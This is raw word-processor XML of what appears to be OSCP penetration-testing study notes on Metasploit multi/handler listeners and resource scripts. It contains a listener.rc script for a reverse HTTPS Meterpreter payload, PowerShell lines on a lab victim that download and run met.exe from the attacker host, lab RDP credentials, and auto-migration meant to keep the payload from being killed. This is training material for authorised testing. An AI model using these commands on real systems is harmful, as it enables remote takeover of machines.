      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and port 443 as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module and set up the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5196165" cy="4138613"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="331" name="image321.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image321.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId157"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5196165"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Once our listener is running on port 443, we can start </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again on BRUTE2. Our Metasploit multi/handler receives the incoming staged payload and provides us with an interactive reverse shell in the context of a session.</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Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any arguments will block the command prompt until execution finishes or we background the session. As we've learned before, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start the listener in the background, allowing us to continue other work while we wait for the connection. We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to get a list of all currently active jobs, such as active listeners waiting for connections.</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As Metasploit created a new session for the incoming connection, we could now again interact with it with sessions -i and the session ID as argument.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fja1c96nlyt" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automating Metasploit using Resource Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (21.4. Automating Metasploit)</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Metasploit automates various tasks and operations for us, but we can create scripts to further automate repetitive commands inside the framework itself. These scripts are called Resource Scripts. In this Learning Unit, we'll explore how to create and use them.</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource scripts can chain together a series of Metasploit console commands and Ruby code. Meaning, we can either use the built-in commands of Metasploit or write code in</w:t>
      </w:r>
      <w:hyperlink r:id="rId158">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId159">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ruby</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as it's the language Metasploit is developed in) to manage control flow as well as develop advanced logic components for resource scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000603">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In a penetration test, we may need to set up several multi/handler listeners each time we want to receive an incoming reverse shell. We could either let Metasploit run in the background the whole time or start Metasploit and manually set up a listener each time. We could also create a resource script to automate this task for us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000604">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's create a resource script that starts a multi/handler listener for a non-staged Windows 64-bit Meterpreter payload. To do this, we can create a file in the home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener.rc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and open it in an editor such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId160">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId161">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mousepad</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000605">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first need to think about the sequence of the commands we want to execute. For this example, the first command is to activate the multi/handler module. Then, we set the payload, which in our case, is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter_reverse_https</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Next, we can set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> options to fit our needs.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000608">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/meterpreter_reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000609">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 192.168.119.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 443</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In addition, we can configure the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AutoRunScript</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to automatically execute a module after a session was created. For this example, let's use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/windows/manage/migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module. This will cause the spawned Meterpreter to automatically launch a background </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process and migrate to it. Automating process migration helps to avoid situations where our payload is killed prematurely either by defensive mechanisms or the termination of the related process.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set AutoRunScript post/windows/manage/migrate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 88 - Set AutoRunScript to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module</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Let's also set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExitOnSession</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that the listener keeps accepting new connections after a session is created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set ExitOnSession false  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000613">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 89 - Set ExitOnSession to false to keep the multi/handler listening after a connection</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We can also configure advanced options such as ExitOnSession in multi/handler and AutoRunScript in payloads by using show advanced within the activated module or selected payload.</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t xml:space="preserve">Finally, we'll add run with the arguments -z and -j to run it as a job in the background and to stop us from automatically interacting with the session.</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run -z -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 90 - Command to launch the module</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Now, let's save the script and start Metasploit by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the resource script as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3940992" cy="3214688"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="215" name="image216.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image216.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3940992"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfconsole -r listener.rc</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 91 shows that all of our commands were executed as specified in the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000622">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's connect to the BRUTE2 machine via RDP with user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">justin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperS3cure1337#</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, start PowerShell, download the malicious Windows executable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we already used in previous sections, and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000623">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="416" name="image394.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image394.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iwr -uri http://192.168.119.4/met.exe -Outfile met.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\met.exe</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Once </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets executed, Metasploit notifies us about the incoming connection.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3263900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="244" name="image231.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image231.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! Metasploit automatically migrated to the newly spawned Notepad process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of creating our own resource scripts, we can also use the already provided resource scripts from Metasploit. They can be found in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/resource/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in the Metasploit directory.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4081463" cy="2250037"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="108" name="image117.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image117.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
